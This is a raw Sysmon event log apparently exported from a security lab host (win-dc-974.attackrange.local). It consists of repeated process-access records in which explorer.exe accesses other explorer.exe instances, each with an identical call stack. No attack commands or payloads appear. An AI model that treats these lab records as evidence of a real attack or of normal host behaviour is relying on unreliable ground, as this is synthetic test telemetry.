16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 